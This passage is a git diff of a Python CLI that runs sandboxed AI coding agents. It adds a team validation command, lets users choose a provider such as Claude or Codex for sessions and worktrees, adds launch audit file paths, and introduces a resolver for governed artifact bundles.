1) + if url.endswith(".git"): + url = url[:-4] + config_source_display = url + elif source_type == "url": + url = raw_source.get("url", "") + if url.startswith("https://"): + url = url[8:] + config_source_display = url + + # Get trust grants for federated teams + trust_grants: dict[str, Any] | None = None + if is_federated and org_config: + profiles = org_config.get("profiles", {}) + profile = profiles.get(team_name, {}) + if isinstance(profile, dict): + trust_grants = profile.get("trust") + + if not details: + if not is_json_mode(): + console.print( + create_warning_panel( + "Team Not Found", + f"No team profile named '{team_name}'.", + "Run 'scc team list' to see available profiles", + ) + ) + return {"team": team_name, "found": False, "profile": None} + + # Get validation info + validation = teams.validate_team_profile(team_name, org_config) + + # Human output + if not is_json_mode(): + grid = Table.grid(padding=(0, 2)) + grid.add_column(style="dim", no_wrap=True) + grid.add_column(style="white") + + grid.add_row("Description:", details.get("description", "-")) + + # Show federation mode + if is_federated: + grid.add_row("Mode:", "[cyan]federated[/cyan]") + if config_source_display: + grid.add_row("Config Source:", config_source_display) + else: + grid.add_row("Mode:", "[dim]inline[/dim]") + + plugins = details.get("plugins", []) + if plugins: + plugins_display = ", ".join(plugins) + grid.add_row("Plugins:", plugins_display) + if details.get("marketplace_repo"): + grid.add_row("Marketplace:", details.get("marketplace_repo", "-")) + else: + grid.add_row("Plugins:", "[dim]None (base profile)[/dim]") + + # Show trust grants for federated teams + if trust_grants: + grid.add_row("", "") + grid.add_row("[bold]Trust Grants:[/bold]", "") + inherit = trust_grants.get("inherit_org_marketplaces", True) + allow_add = trust_grants.get("allow_additional_marketplaces", False) + grid.add_row( + " Inherit Org Marketplaces:", + "[green]yes[/green]" if inherit else "[red]no[/red]", + ) + grid.add_row( + " Allow Additional Marketplaces:", + "[green]yes[/green]" if allow_add else "[red]no[/red]", + ) + + # Show validation warnings + if validation.get("warnings"): + grid.add_row("", "") + for warning in validation["warnings"]: + grid.add_row("[yellow]Warning:[/yellow]", warning) + + panel = Panel( + grid, + title=f"[bold cyan]Team: {team_name}[/bold cyan]", + border_style="cyan", + padding=(1, 2), + ) + + console.print() + console.print(panel) + console.print() + console.print(f"[dim]Use: scc start -t {team_name} to use this profile[/dim]") + + # Build response with federation metadata + response: dict[str, Any] = { + "team": team_name, + "found": True, + "is_federated": is_federated, + "profile": { + "name": details.get("name"), + "description": details.get("description"), + "plugins": details.get("plugins", []), + "marketplace": details.get("marketplace"), + "marketplace_type": details.get("marketplace_type"), + "marketplace_repo": details.get("marketplace_repo"), + }, + "validation": { + "valid": validation.get("valid", True), + "warnings": validation.get("warnings", []), + "errors": validation.get("errors", []), + }, + } + + # Add federation details for federated teams + if is_federated: + response["config_source"] = config_source_display + if trust_grants: + response["trust"] = trust_grants + + return response diff --git a/src/scc_cli/commands/team_validate.py b/src/scc_cli/commands/team_validate.py new file mode 100644 index 0000000..44c9a08 --- /dev/null +++ b/src/scc_cli/commands/team_validate.py @@ -0,0 +1,317 @@ +"""Team validation command and rendering. + +Extracted from team.py to reduce module size. Contains: +- team_validate: validates team configuration (plugins, security, cache) +- _render_validation_result: renders validation result to terminal + +These are plain functions, registered on team_app by team.py. +""" + +from __future__ import annotations + +from typing import Any + +import typer +from rich.panel import Panel +from rich.table import Table + +from .. import config +from ..cli_common import console +from ..marketplace.compute import TeamNotFoundError +from ..marketplace.resolve import ConfigFetchError, EffectiveConfig, resolve_effective_config +from ..marketplace.schema import OrganizationConfig, normalize_org_config_data +from ..marketplace.trust import TrustViolationError +from ..output_mode import is_json_mode +from ..panels import create_warning_panel + + +def team_validate( + team_name: str | None = typer.Argument( + None, help="Team name to validate (defaults to current)" + ), + file: str | None = typer.Option( + None, "--file", "-f", help="Path to a team config file to validate" + ), + verbose: bool = typer.Option(False, "--verbose", "-v", help="Show detailed output"), + json_output: bool = typer.Option(False, "--json", help="Output as JSON envelope"), + pretty: bool = typer.Option(False, "--pretty", help="Pretty-print JSON (implies --json)"), +) -> dict[str, Any]: + """Validate team configuration and show effective plugins. + + Resolves the team configuration (inline or federated) and validates: + - Plugin security compliance (blocked_plugins patterns) + - Plugin allowlists (allowed_plugins patterns) + - Marketplace trust grants (for federated teams) + - Cache freshness status (for federated teams) + + Use --file to validate a local team config file against the schema. + Use --verbose to see detailed validation information. + """ + from .team import _looks_like_path, _validate_team_config_file + + if file and team_name: + if not is_json_mode(): + console.print( + create_warning_panel( + "Conflicting Inputs", + "Use either TEAM_NAME or --file, not both.", + "Examples: scc team validate backend | scc team validate --file team.json", + ) + ) + return { + "mode": "team", + "team": team_name, + "valid": False, + "error": "Conflicting inputs: provide TEAM_NAME or --file, not both", + } + + # File validation mode (explicit or detected) + if file or (team_name and _looks_like_path(team_name)): + source = file or team_name or "" + return _validate_team_config_file(source, verbose) + + # Default to current team if omitted + if not team_name: + cfg = config.load_user_config() + team_name = cfg.get("selected_profile") + if not team_name: + if not is_json_mode(): + console.print( + create_warning_panel( + "No Team Selected", + "No team provided and no current team is selected.", + "Run 'scc team list' or 'scc team switch ' to select one.", + ) + ) + return { + "mode": "team", + "team": None, + "valid": False, + "error": "No team selected", + } + + org_config_data = config.load_cached_org_config() + if not org_config_data: + if not is_json_mode(): + console.print( + create_warning_panel( + "No Org Config", + "No organization configuration found.", + "Run 'scc setup' to configure your organization", + ) + ) + return { + "mode": "team", + "team": team_name, + "valid": False, + "error": "No organization configuration found", + } + + # Parse org config + try: + org_config = OrganizationConfig.model_validate(normalize_org_config_data(org_config_data)) + except Exception as e: + if not is_json_mode(): + console.print( + create_warning_panel( + "Invalid Org Config", + f"Organization configuration is invalid: {e}", + "Run 'scc org update' to refresh your configuration", + ) + ) + return { + "mode": "team", + "team": team_name, + "valid": False, + "error": f"Invalid org config: {e}", + } + + # Resolve effective config + try: + effective = resolve_effective_config(org_config, team_name) + except TeamNotFoundError as e: + if not is_json_mode(): + console.print( + create_warning_panel( + "Team Not Found", + f"Team '{team_name}' not found in org config.", + f"Available teams: {', '.join(e.available_teams[:5])}", + ) + ) + return { + "mode": "team", + "team": team_name, + "valid": False, + "error": f"Team not found: {team_name}", + "available_teams": e.available_teams, + } + except TrustViolationError as e: + if not is_json_mode(): + console.print( + create_warning_panel( + "Trust Violation", + f"Team configuration violates trust policy: {e.violation}", + "Check team config_source and trust grants in org config", + ) + ) + return { + "mode": "team", + "team": team_name, + "valid": False, + "error": f"Trust violation: {e.violation}", + "team_name": e.team_name, + } + except ConfigFetchError as e: + if not is_json_mode(): + console.print( + create_warning_panel( + "Config Fetch Failed", + f"Failed to fetch config for team '{e.team_id}' from {e.source_type}", + str(e), + ) + ) + return { + "mode": "team", + "team": team_name, + "valid": False, + "error": str(e), + "source_type": e.source_type, + "source_url": e.source_url, + } + + # Determine overall validity + is_valid = not effective.has_security_violations + + # Human output + if not is_json_mode(): + _render_validation_result(effective, verbose) + + # Build JSON response + response: dict[str, Any] = { + "mode": "team", + "team": team_name, + "valid": is_valid, + "is_federated": effective.is_federated, + "enabled_plugins_count": effective.plugin_count, + "blocked_plugins_count": len(effective.blocked_plugins), + "disabled_plugins_count": len(effective.disabled_plugins), + "not_allowed_plugins_count": len(effective.not_allowed_plugins), + } + + # Add federation metadata + if effective.is_federated: + response["config_source"] = effective.source_description + if effective.config_commit_sha: + response["config_commit_sha"] = effective.config_commit_sha + if effective.config_etag: + response["config_etag"] = effective.config_etag + + # Add cache status + if effective.used_cached_config: + response["used_cached_config"] = True + response["cache_is_stale"] = effective.cache_is_stale + if effective.staleness_warning: + response["staleness_warning"] = effective.staleness_warning + + # Add verbose details + if verbose or json_output or pretty: + response["enabled_plugins"] = sorted(effective.enabled_plugins) + response["blocked_plugins"] = [ + {"plugin_id": bp.plugin_id, "reason": bp.reason, "pattern": bp.pattern} + for bp in effective.blocked_plugins + ] + response["disabled_plugins"] = effective.disabled_plugins + response["not_allowed_plugins"] = effective.not_allowed_plugins + response["extra_marketplaces"] = effective.extra_marketplaces + + return response + + +def _render_validation_result(effective: EffectiveConfig, verbose: bool) -> None: + """Render validation result to terminal.""" + console.print() + + # Header with validation status + if effective.has_security_violations: + status = "[red]FAILED[/red]" + border_style = "red" + else: + status = "[green]PASSED[/green]" + border_style = "green" + + grid = Table.grid(padding=(0, 2)) + grid.add_column(style="dim", no_wrap=True) + grid.add_column() + + # Basic info + grid.add_row("Status:", status) + grid.add_row( + "Mode:", "[cyan]federated[/cyan]" if effective.is_federated else "[dim]inline[/dim]" + ) + + if effective.is_federated: + grid.add_row("Config Source:", effective.source_description) + if effective.config_commit_sha: + grid.add_row("Commit SHA:", effective.config_commit_sha[:8]) + + # Cache status + if effective.used_cached_config: + cache_status = ( + "[yellow]stale[/yellow]" if effective.cache_is_stale else "[green]fresh[/green]" + ) + grid.add_row("Cache:", cache_status) + if effective.staleness_warning: + grid.add_row("", f"[dim]{effective.staleness_warning}[/dim]") + + grid.add_row("", "") + + # Plugin summary + grid.add_row("Enabled Plugins:", f"[green]{effective.plugin_count}[/green]") + if effective.blocked_plugins: + grid.add_row("Blocked Plugins:", f"[red]{len(effective.blocked_plugins)}[/red]") + if effective.disabled_plugins: + grid.add_row("Disabled Plugins:", f"[yellow]{len(effective.disabled_plugins)}[/yellow]") + if effective.not_allowed_plugins: + grid.add_row("Not Allowed:", f"[yellow]{len(effective.not_allowed_plugins)}[/yellow]") + + # Verbose details + if verbose: + grid.add_row("", "") + if effective.enabled_plugins: + grid.add_row("[bold]Enabled:[/bold]", "") + for plugin in sorted(effective.enabled_plugins): + grid.add_row("", f" [green]✓[/green] {plugin}") + + if effective.blocked_plugins: + grid.add_row("[bold]Blocked:[/bold]", "") + for bp in effective.blocked_plugins: + grid.add_row("", f" [red]✗[/red] {bp.plugin_id}") + grid.add_row("", f" [dim]Reason: {bp.reason}[/dim]") + grid.add_row("", f" [dim]Pattern: {bp.pattern}[/dim]") + + if effective.disabled_plugins: + grid.add_row("[bold]Disabled:[/bold]", "") + for plugin in effective.disabled_plugins: + grid.add_row("", f" [yellow]○[/yellow] {plugin}") + + if effective.not_allowed_plugins: + grid.add_row("[bold]Not Allowed:[/bold]", "") + for plugin in effective.not_allowed_plugins: + grid.add_row("", f" [yellow]○[/yellow] {plugin}") + + panel = Panel( + grid, + title=f"[bold cyan]Team Validation: {effective.team_id}[/bold cyan]", + border_style=border_style, + padding=(1, 2), + ) + console.print(panel) + + # Hint + if not verbose and ( + effective.blocked_plugins or effective.disabled_plugins or effective.not_allowed_plugins + ): + console.print() + console.print("[dim]Use --verbose for detailed plugin information[/dim]") + + console.print() diff --git a/src/scc_cli/commands/worktree/app.py b/src/scc_cli/commands/worktree/app.py index 105cc02..9eee1ca 100644 --- a/src/scc_cli/commands/worktree/app.py +++ b/src/scc_cli/commands/worktree/app.py @@ -4,7 +4,7 @@ This module contains the Typer app definitions and wires commands from: - worktree_commands.py: Git worktree management - container_commands.py: Docker container management -- session_commands.py: Claude Code session management +- session_commands.py: Session management - context_commands.py: Work context management """ diff --git a/src/scc_cli/commands/worktree/container_commands.py b/src/scc_cli/commands/worktree/container_commands.py index 120b3d9..24433d8 100644 --- a/src/scc_cli/commands/worktree/container_commands.py +++ b/src/scc_cli/commands/worktree/container_commands.py @@ -134,8 +134,8 @@ def list_cmd( ], ) - console.print("[dim]Resume with: docker start -ai [/dim]") - console.print("[dim]Or use: scc list -i for interactive mode[/dim]") + console.print("[dim]Resume work with: scc sessions --select or scc[/dim]") + console.print("[dim]Or use: scc list -i for interactive container actions[/dim]") @handle_errors @@ -144,9 +144,7 @@ def stop_cmd( None, help="Container name or ID to stop (omit for interactive picker)", ), - all_containers: bool = typer.Option( - False, "--all", "-a", help="Stop all running Claude Code sandboxes" - ), + all_containers: bool = typer.Option(False, "--all", "-a", help="Stop all running sandboxes"), interactive: bool = typer.Option( False, "-i", "--interactive", help="Use multi-select picker to choose containers" ), @@ -164,15 +162,14 @@ def stop_cmd( scc stop --yes # Stop all without confirmation """ with Status("[cyan]Fetching sandboxes...[/cyan]", console=console, spinner=Spinners.DOCKER): - # List Docker Desktop sandbox containers (image: docker/sandbox-templates:claude-code) - running = docker.list_running_sandboxes() + running = docker.list_running_scc_containers() if not running: console.print( create_info_panel( - "No Running Sandboxes", - "No Claude Code sandboxes are currently running.", - "Start one with: scc -w /path/to/project", + "No Running Containers", + "No SCC-managed containers are currently running.", + "Start one with: scc start ~/project", ) ) return @@ -302,7 +299,7 @@ def prune_cmd( with Status("[cyan]Fetching containers...[/cyan]", console=console, spinner=Spinners.DOCKER): # Use _list_all_sandbox_containers to find ALL sandbox containers (by image) # This matches how stop_cmd uses list_running_sandboxes (also by image) - # Containers created by Docker Desktop directly don't have SCC labels + # Containers not created by SCC don't have SCC labels all_containers = docker._list_all_sandbox_containers() # Filter to only stopped containers diff --git a/src/scc_cli/commands/worktree/session_commands.py b/src/scc_cli/commands/worktree/session_commands.py index c67ae6a..970b8dd 100644 --- a/src/scc_cli/commands/worktree/session_commands.py +++ b/src/scc_cli/commands/worktree/session_commands.py @@ -1,4 +1,4 @@ -"""Session commands for Claude Code session management.""" +"""Session commands for agent session management.""" from __future__ import annotations @@ -52,7 +52,7 @@ def sessions_cmd( json_output: bool = typer.Option(False, "--json", help="Output as JSON"), pretty: bool = typer.Option(False, "--pretty", help="Pretty-print JSON (implies --json)"), ) -> dict[str, Any]: - """List recent Claude Code sessions.""" + """List recent sessions.""" cfg = config.load_user_config() active_team = cfg.get("selected_profile") standalone_mode = config.is_standalone_mode() @@ -90,6 +90,7 @@ def sessions_cmd( "last_used": session.last_used, "container_name": session.container_name, "branch": session.branch, + "provider_id": session.provider_id or "claude", } for session in recent ] @@ -139,6 +140,7 @@ def sessions_cmd( ws, _format_last_used(session.last_used), session.team or "-", + session.provider_id or "claude", ] ) @@ -158,6 +160,7 @@ def sessions_cmd( wide_columns=[ ("Last Used", "yellow"), ("Team", "green"), + ("Provider", "magenta"), ], ) @@ -179,7 +182,7 @@ def session_list_cmd( json_output: bool = typer.Option(False, "--json", help="Output as JSON"), pretty: bool = typer.Option(False, "--pretty", help="Pretty-print JSON (implies --json)"), ) -> None: - """List recent Claude Code sessions. + """List recent sessions. Alias for 'scc sessions'. Provides symmetric command structure. diff --git a/src/scc_cli/commands/worktree/worktree_commands.py b/src/scc_cli/commands/worktree/worktree_commands.py index 5333d49..46c5580 100644 --- a/src/scc_cli/commands/worktree/worktree_commands.py +++ b/src/scc_cli/commands/worktree/worktree_commands.py @@ -10,12 +10,8 @@ from ... import config from ...application import worktree as worktree_use_cases -from ...application.start_session import ( - StartSessionDependencies, - StartSessionRequest, - prepare_start_session, - start_session, -) +from ...application.launch import finalize_launch +from ...application.start_session import StartSessionRequest from ...bootstrap import get_default_adapters from ...cli_common import console, err_console, handle_errors from ...confirm import Confirm @@ -25,14 +21,19 @@ from ...git import WorktreeInfo from ...json_command import json_command from ...kinds import Kind -from ...marketplace.materialize import materialize_marketplace -from ...marketplace.resolve import resolve_effective_config from ...output_mode import is_json_mode from ...panels import create_success_panel, create_warning_panel +from ...ports.config_models import NormalizedOrgConfig from ...theme import Indicators, Spinners from ...ui import cleanup_worktree, render_worktrees from ...ui.gate import InteractivityContext from ...ui.picker import TeamSwitchRequested, pick_worktree +from ..launch.dependencies import prepare_live_start_plan +from ..launch.preflight import ( + collect_launch_readiness, + ensure_launch_ready, + resolve_launch_provider, +) from ._helpers import build_worktree_list_data if TYPE_CHECKING: @@ -136,9 +137,7 @@ def worktree_create_cmd( base_branch: str | None = typer.Option( None, "-b", "--base", help="Base branch (default: current)" ), - start_claude: bool = typer.Option( - True, "--start/--no-start", help="Start Claude after creating" - ), + start_agent: bool = typer.Option(True, "--start/--no-start", help="Start agent after creating"), install_deps: bool = typer.Option( False, "--install-deps", help="Install dependencies after creating worktree" ), @@ -236,36 +235,67 @@ def worktree_create_cmd( else: console.print("[yellow]! Could not detect package manager or install failed[/yellow]") - if start_claude: + if start_agent: console.print() - if Confirm.ask("[cyan]Start Claude Code in this worktree?[/cyan]", default=True): + if Confirm.ask("[cyan]Start agent in this worktree?[/cyan]", default=True): adapters.sandbox_runtime.ensure_available() - start_dependencies = StartSessionDependencies( - filesystem=adapters.filesystem, - remote_fetcher=adapters.remote_fetcher, - clock=adapters.clock, - git_client=adapters.git_client, - agent_runner=adapters.agent_runner, - sandbox_runtime=adapters.sandbox_runtime, - resolve_effective_config=resolve_effective_config, - materialize_marketplace=materialize_marketplace, + user_config = config.load_user_config() + standalone_mode = config.is_standalone_mode() + team = None if standalone_mode else user_config.get("selected_profile") + raw_org_config = None if standalone_mode else config.load_cached_org_config() + normalized_org = ( + NormalizedOrgConfig.from_dict(raw_org_config) + if raw_org_config is not None + else None + ) + # Shared preflight: resolve → readiness → ensure ready + resolved_provider, _source = resolve_launch_provider( + cli_flag=None, + resume_provider=None, + workspace_path=result.worktree_path, + config_provider=user_config.get("selected_provider"), + normalized_org=normalized_org, + team=team, + adapters=adapters, + non_interactive=False, ) + if resolved_provider is None: + console.print("[dim]Cancelled.[/dim]") + raise typer.Exit(EXIT_CANCELLED) + readiness = collect_launch_readiness(resolved_provider, _source, adapters) + if not readiness.launch_ready: + ensure_launch_ready( + readiness, + adapters=adapters, + console=console, + non_interactive=False, + show_notice=lambda title, content, subtitle: console.print( + create_warning_panel(title, content, subtitle) + ), + ) start_request = StartSessionRequest( workspace_path=result.worktree_path, workspace_arg=str(result.worktree_path), entry_dir=result.worktree_path, - team=None, + team=team, session_name=None, resume=False, fresh=False, offline=False, - standalone=config.is_standalone_mode(), + standalone=standalone_mode, dry_run=False, allow_suspicious=False, - org_config=config.load_cached_org_config(), + org_config=normalized_org, + raw_org_config=raw_org_config, + provider_id=resolved_provider, + ) + start_dependencies, start_plan = prepare_live_start_plan( + start_request, + adapters=adapters, + console=console, + provider_id=resolved_provider, ) - start_plan = prepare_start_session(start_request, dependencies=start_dependencies) - start_session(start_plan, dependencies=start_dependencies) + finalize_launch(start_plan, dependencies=start_dependencies) @json_command(Kind.WORKTREE_LIST) diff --git a/src/scc_cli/config.py b/src/scc_cli/config.py index 161cc7a..0f766fa 100644 --- a/src/scc_cli/config.py +++ b/src/scc_cli/config.py @@ -33,6 +33,11 @@ # Cache directory (regenerable, safe to delete) CACHE_DIR = Path.home() / ".cache" / "scc" +# Durable local audit storage +AUDIT_DIR = CONFIG_DIR / "audit" +LAUNCH_AUDIT_FILE = AUDIT_DIR / "launch-events.jsonl" +LAUNCH_AUDIT_LOCK_FILE = AUDIT_DIR / "launch-events.lock" + # ═══════════════════════════════════════════════════════════════════════════════ # User Config Defaults @@ -42,6 +47,7 @@ "config_version": "1.0.0", "organization_source": None, # Set during setup: {"url": "...", "auth": "...", "auth_header": "..."} "selected_profile": None, + "selected_provider": None, "standalone": False, "workspace_team_map": {}, "cache": { @@ -78,6 +84,21 @@ def get_cache_dir() -> Path: return CACHE_DIR +def get_audit_dir() -> Path: + """Get the durable audit directory path.""" + return AUDIT_DIR + + +def get_launch_audit_file() -> Path: + """Get the append-only launch audit file path.""" + return LAUNCH_AUDIT_FILE + + +def get_launch_audit_lock_file() -> Path: + """Get the launch audit lock file path.""" + return LAUNCH_AUDIT_LOCK_FILE + + # ═══════════════════════════════════════════════════════════════════════════════ # Deep Merge Utility # ═══════════════════════════════════════════════════════════════════════════════ @@ -217,6 +238,37 @@ def set_selected_profile(profile: str) -> None: save_user_config(config) +# ═══════════════════════════════════════════════════════════════════════════════ +# Provider Selection +# ═══════════════════════════════════════════════════════════════════════════════ + + +def get_selected_provider() -> str | None: + """Get the persisted provider preference. + + Returns: + ``"claude"`` or ``"codex"`` for a concrete preference, + ``"ask"`` for an explicit "prompt when ambiguous" preference, + or ``None`` when no startup preference has been configured yet. + """ + config = load_user_config() + provider = config.get("selected_provider") + return provider if isinstance(provider, str) else None + + +def set_selected_provider(provider: str | None) -> None: + """Set the persisted provider preference. + + Args: + provider: ``"claude"`` or ``"codex"`` for a concrete preference, + ``"ask"`` to always prompt when multiple providers are viable, + or ``None`` to clear the preference entirely. + """ + config = load_user_config() + config["selected_provider"] = provider + save_user_config(config) + + # ═══════════════════════════════════════════════════════════════════════════════ # Workspace Team Pinning # ═══════════════════════════════════════════════════════════════════════════════ diff --git a/src/scc_cli/contexts.py b/src/scc_cli/contexts.py index 80dcce0..3420155 100644 --- a/src/scc_cli/contexts.py +++ b/src/scc_cli/contexts.py @@ -101,6 +101,7 @@ class WorkContext: last_session_id: str | None = None last_used: str = field(default_factory=lambda: datetime.now(timezone.utc).isoformat()) pinned: bool = False + provider_id: str | None = None @property def repo_name(self) -> str: @@ -119,9 +120,14 @@ def display_label(self) -> str: Uses branch name if available, otherwise falls back to worktree directory name. This provides meaningful labels (branch names) while maintaining stability (directory names don't change when branches switch). + + Appends provider info when provider_id is set and not 'claude' (the default). """ name = self.branch or self.worktree_name - return f"{self.team_label} · {self.repo_name} · {name}" + label = f"{self.team_label} · {self.repo_name} · {name}" + if self.provider_id and self.provider_id != "claude": + label = f"{label} ({self.provider_id})" + return label @property def unique_key(self) -> tuple[str | None, Path, Path]: @@ -139,6 +145,7 @@ def to_dict(self) -> dict[str, Any]: "last_session_id": self.last_session_id, "last_used": self.last_used, "pinned": self.pinned, + "provider_id": self.provider_id, } @classmethod @@ -156,6 +163,7 @@ def from_dict(cls, data: dict[str, Any]) -> WorkContext: last_session_id=data.get("last_session_id"), last_used=data.get("last_used", datetime.now(timezone.utc).isoformat()), pinned=data.get("pinned", False), + provider_id=data.get("provider_id"), ) @@ -259,6 +267,7 @@ def _merge_contexts(existing: WorkContext, incoming: WorkContext) -> WorkContext last_session_id=incoming.last_session_id or existing.last_session_id, last_used=datetime.now(timezone.utc).isoformat(), pinned=existing.pinned, # Preserve pinned status + provider_id=incoming.provider_id or existing.provider_id, ) @@ -288,6 +297,7 @@ def record_context(context: WorkContext) -> None: last_session_id=context.last_session_id, last_used=datetime.now(timezone.utc).isoformat(), pinned=context.pinned, + provider_id=context.provider_id, ) # Find and update or append @@ -351,6 +361,7 @@ def toggle_pin(team: str, repo_root: str | Path, worktree_path: str | Path) -> b last_session_id=ctx.last_session_id, last_used=ctx.last_used, pinned=not ctx.pinned, + provider_id=ctx.provider_id, ) _save_contexts_raw([c.to_dict() for c in contexts]) return contexts[i].pinned diff --git a/src/scc_cli/core/bundle_resolver.py b/src/scc_cli/core/bundle_resolver.py new file mode 100644 index 0000000..f2a7d0c --- /dev/null +++ b/src/scc_cli/core/bundle_resolver.py @@ -0,0 +1,267 @@ +"""Bundle resolution: compute ArtifactRenderPlan from NormalizedOrgConfig. + +Pure core function — no imports from marketplace/, adapters/, or commands/. + +resolve_render_plan() reads a team's enabled_bundles, resolves each bundle ID +against the org's governed_artifacts catalog, filters by install_intent and +provider compatibility, and returns an ArtifactRenderPlan per bundle. + +Fail-closed semantics: +- Missing bundle ID → BundleResolutionError with available alternatives. +- Disabled bundle → skip with audit diagnostic (not an error). +- Invalid artifact reference → InvalidArtifactReferenceError blocks the bundle. +""" + +from __future__ import annotations + +import logging +from dataclasses import dataclass + +from scc_cli.core.errors import ( + BundleResolutionError, + InvalidArtifactReferenceError, +) +from scc_cli.core.governed_artifacts import ( + ArtifactInstallIntent, + ArtifactKind, + ArtifactRenderPlan, + PortableArtifact, + ProviderArtifactBinding, +) +from scc_cli.ports.config_models import GovernedArtifactsCatalog, NormalizedOrgConfig + +logger = logging.getLogger(__name__) + +# --------------------------------------------------------------------------- +# Resolution diagnostics +# --------------------------------------------------------------------------- + + +@dataclass(frozen=True) +class BundleResolutionDiagnostic: + """Diagnostic info about why an artifact was skipped during resolution.""" + + artifact_name: str + reason: str + + +@dataclass(frozen=True) +class BundleResolutionResult: + """Complete resolution result for a team's enabled bundles. + + Contains the render plans (one per resolved bundle) plus diagnostics + about what was skipped or could not be resolved. + """ + + plans: tuple[ArtifactRenderPlan, ...] + diagnostics: tuple[BundleResolutionDiagnostic, ...] + + +# --------------------------------------------------------------------------- +# Resolution logic +# --------------------------------------------------------------------------- + + +def _resolve_single_bundle( + bundle_id: str, + provider: str, + catalog: GovernedArtifactsCatalog, + *, + fail_closed: bool = False, +) -> tuple[ArtifactRenderPlan, list[BundleResolutionDiagnostic]]: + """Resolve one bundle into an ArtifactRenderPlan for the given provider. + + Args: + bundle_id: The bundle identifier to resolve. + provider: Target provider (e.g. ``'claude'``, ``'codex'``). + catalog: Governed artifacts catalog to resolve against. + fail_closed: If True, missing bundles and invalid artifact references + raise typed exceptions instead of producing diagnostics. + + Returns: + A tuple of (plan, diagnostics) where diagnostics lists skipped artifacts. + + Raises: + BundleResolutionError: If ``fail_closed`` is True and the bundle + is not found in the catalog. + InvalidArtifactReferenceError: If ``fail_closed`` is True and an + artifact referenced by the bundle does not exist in the catalog. + """ + bundle = catalog.bundles.get(bundle_id) + if bundle is None: + available = sorted(catalog.bundles.keys()) + if fail_closed: + raise BundleResolutionError( + bundle_id=bundle_id, + available_bundles=tuple(available), + ) + diag = BundleResolutionDiagnostic( + artifact_name=bundle_id, + reason=f"bundle not found in catalog; available: {available}", + ) + return ( + ArtifactRenderPlan(bundle_id=bundle_id, provider=provider), + [diag], + ) + + # If the bundle itself is disabled, skip everything (audit-logged, not error) + if bundle.install_intent == ArtifactInstallIntent.DISABLED: + logger.info("Bundle '%s' is disabled — skipping", bundle_id) + diag = BundleResolutionDiagnostic( + artifact_name=bundle_id, + reason="bundle install_intent is disabled", + ) + return ( + ArtifactRenderPlan(bundle_id=bundle_id, provider=provider), + [diag], + ) + + effective_artifacts: list[str] = [] + collected_bindings: list[ProviderArtifactBinding] = [] + collected_portable: list[PortableArtifact] = [] + skipped: list[str] = [] + diagnostics: list[BundleResolutionDiagnostic] = [] + + for art_name in bundle.artifacts: + artifact = catalog.artifacts.get(art_name) + if artifact is None: + if fail_closed: + raise InvalidArtifactReferenceError( + bundle_id=bundle_id, + artifact_name=art_name, + reason="artifact not found in governed artifacts catalog", + ) + skipped.append(art_name) + diagnostics.append( + BundleResolutionDiagnostic( + artifact_name=art_name, + reason="artifact not found in catalog", + ) + ) + continue + + # Check install_intent — disabled and request-only are skipped + if artifact.install_intent == ArtifactInstallIntent.DISABLED: + skipped.append(art_name) + diagnostics.append( + BundleResolutionDiagnostic( + artifact_name=art_name, + reason="artifact install_intent is disabled", + ) + ) + continue + + if artifact.install_intent == ArtifactInstallIntent.REQUEST_ONLY: + skipped.append(art_name) + diagnostics.append( + BundleResolutionDiagnostic( + artifact_name=art_name, + reason="artifact install_intent is request-only (not auto-rendered)", + ) + ) + continue + + # Find provider-compatible bindings + art_bindings = catalog.bindings.get(art_name, ()) + provider_bindings = tuple(b for b in art_bindings if b.provider == provider) + + if not provider_bindings: + # Artifact exists but has no binding for this provider. + # Native integrations always require a binding — skip them. + if artifact.kind == ArtifactKind.NATIVE_INTEGRATION: + skipped.append(art_name) + diagnostics.append( + BundleResolutionDiagnostic( + artifact_name=art_name, + reason=f"native_integration has no binding for provider '{provider}'", + ) + ) + continue + + # Skills and MCP servers are portable — they can be rendered + # from their source metadata without a provider-specific + # binding (D023). Include them in portable_artifacts so + # renderers can project them into provider-native surfaces. + if artifact.kind in (ArtifactKind.SKILL, ArtifactKind.MCP_SERVER): + collected_portable.append( + PortableArtifact( + name=artifact.name, + kind=artifact.kind, + source_type=artifact.source_type, + source_url=artifact.source_url, + source_path=artifact.source_path, + source_ref=artifact.source_ref, + version=artifact.version, + ) + ) + + effective_artifacts.append(art_name) + collected_bindings.extend(provider_bindings) + + plan = ArtifactRenderPlan( + bundle_id=bundle_id, + provider=provider, + bindings=tuple(collected_bindings), + skipped=tuple(skipped), + effective_artifacts=tuple(effective_artifacts), + portable_artifacts=tuple(collected_portable), + ) + return plan, diagnostics + + +def resolve_render_plan( + org_config: NormalizedOrgConfig, + team_name: str, + provider: str, + *, + fail_closed: bool = False, +) -> BundleResolutionResult: + """Resolve all enabled bundles for a team into ArtifactRenderPlans. + + Pure function — reads from NormalizedOrgConfig, produces plans and + diagnostics. No side effects. + + Args: + org_config: The normalized org configuration containing the + governed_artifacts catalog and team profiles. + team_name: Name of the team profile to resolve bundles for. + provider: Target provider identifier (e.g. 'claude', 'codex'). + fail_closed: If True, missing bundles and invalid artifact references + raise typed exceptions (``BundleResolutionError``, + ``InvalidArtifactReferenceError``) instead of producing + diagnostics. Default is False for backward compatibility. + + Returns: + BundleResolutionResult with plans and diagnostics. + + Raises: + ValueError: If the team profile does not exist in the org config. + BundleResolutionError: If ``fail_closed`` is True and a bundle + referenced by the team does not exist in the catalog. + InvalidArtifactReferenceError: If ``fail_closed`` is True and a + bundle contains an artifact that does not exist in the catalog. + """ + team = org_config.get_profile(team_name) + if team is None: + available = org_config.list_profile_names() + raise ValueError( + f"Team profile '{team_name}' not found in org config; available profiles: {available}" + ) + + catalog = org_config.governed_artifacts + + if not team.enabled_bundles: + return BundleResolutionResult(plans=(), diagnostics=()) + + all_plans: list[ArtifactRenderPlan] = [] + all_diagnostics: list[BundleResolutionDiagnostic] = [] + + for bundle_id in team.enabled_bundles: + plan, diags = _resolve_single_bundle(bundle_id, provider, catalog, fail_closed=fail_closed) + all_plans.append(plan) + all_diagnostics.extend(diags) + + return BundleResolutionResult( + plans=tuple(all_plans), + diagnostics=tuple(all_diagnostics), + ) diff --git a/src/scc_cli/core/constants.py b/src/scc_cli/core/constants.py index 89a0a37..a9fd934 100644 --- a/src/scc_cli/core/constants.py +++ b/src/scc_cli/core/constants.py @@ -1,58 +1,17 @@ """ -Backend-specific constants for SCC-CLI. +Product-level constants for SCC-CLI. -Centralized location for all backend-specific values that identify the -AI coding assistant being sandboxed. Currently supports Claude Code. - -This module enables future extensibility to support other AI coding CLIs -(e.g., Codex, Gemini) by providing a single location to update when -adding new backend support. +Holds version information, schema version, and the worktree branch prefix. +Provider-specific runtime values (images, volumes, mount paths, 